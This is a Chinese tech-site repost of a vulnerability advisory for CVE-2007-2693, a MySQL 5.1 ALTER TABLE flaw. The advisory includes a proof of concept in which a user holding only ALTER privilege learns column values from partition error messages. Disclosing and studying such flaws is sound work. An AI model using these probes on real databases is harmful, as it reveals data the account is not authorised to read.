最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501
当前位置: 首页 - 科技 - 知识百科 - 正文

导致MySQLAlterTable函数信息泄露的原因

来源:懂视网 责编:小采 时间:2020-11-09 14:07:18
文档

导致MySQLAlterTable函数信息泄露的原因

导致MySQLAlterTable函数信息泄露的原因:以下的文章主要讲述的那些情况导致MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧! 受影响系统: MySQLABMySQL5.1.x 5.1.18 不受影响系统: MyS
推荐度:
导读导致MySQLAlterTable函数信息泄露的原因:以下的文章主要讲述的那些情况导致MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧! 受影响系统: MySQLABMySQL5.1.x 5.1.18 不受影响系统: MyS

以下的文章主要讲述的那些情况导致MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧! 受影响系统: MySQLABMySQL5.1.x 5.1.18 不受影响系统: MySQLABMySQL5.1.18

以下的文章主要讲述的那些情况导致MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧!

受影响系统:

  1. MySQL AB MySQL 5.1.x < 5.1.18

不受影响系统:

  1. MySQL AB MySQL 5.1.18

描述:BUGTRAQ ID: 24008

CVE(CAN) ID: CVE-2007-2693

MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL Alter Table功能实现上存在漏洞,能够以合法帐号登录到数据库系统的攻击者可能利用此漏洞非授权获取数据表相关的敏感信息。

如果用户对表格拥有ALTER权限的话,则即使没有SELECT权限也可以通过ALTER TABLE语句获得某些有关表格的敏感信息。例如,用户可以发布以下命令:

  1. ALTER TABLE table1 PARTITION BY LIST (column1) (PARTITION x VALUES IN (0));

MySQL会返回错误消息:

  1. "Table has no partition for value 18".

这样该用户就可以知道存在column1 = 18的列。

测试方法:

以root用户发布:

  1. mysql> create table tu (s1 int);
  2. Query OK, 0 rows affected (0.00 sec)
  3. mysql> insert into tu values (1);
  4. Query OK, 1 row affected (0.00 sec)
  5. mysql> grant alter on tu to molly@localhost;
  6. Query OK, 0 rows affected (0.01 sec)

以molly@localhost发布:

  1. mysql> select * from tu;
  2. ERROR 1142 (42000): SELECT command denied to user 'molly'@'localhost' for table
  3. 'tu'
  4. mysql> alter table tu partition by list (s1) (partition p1 values in (1));
  5. Query OK, 1 row affected (0.05 sec)
  6. Records: 1 Duplicates: 0 Warnings: 0
  7. mysql> alter table tu partition by list (s1) (partition p1 values in (2));
  8. ERROR 1513 (HY000): Table has no partition for value 1

以上的相关内容就是对MySQL Alter Table函数信息泄露漏洞的介绍,望你能有所收获。

声明:本网页内容旨在传播知识,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文档

导致MySQLAlterTable函数信息泄露的原因

导致MySQLAlterTable函数信息泄露的原因:以下的文章主要讲述的那些情况导致MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧! 受影响系统: MySQLABMySQL5.1.x 5.1.18 不受影响系统: MyS
推荐度:
标签: 信息 原因 引起
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top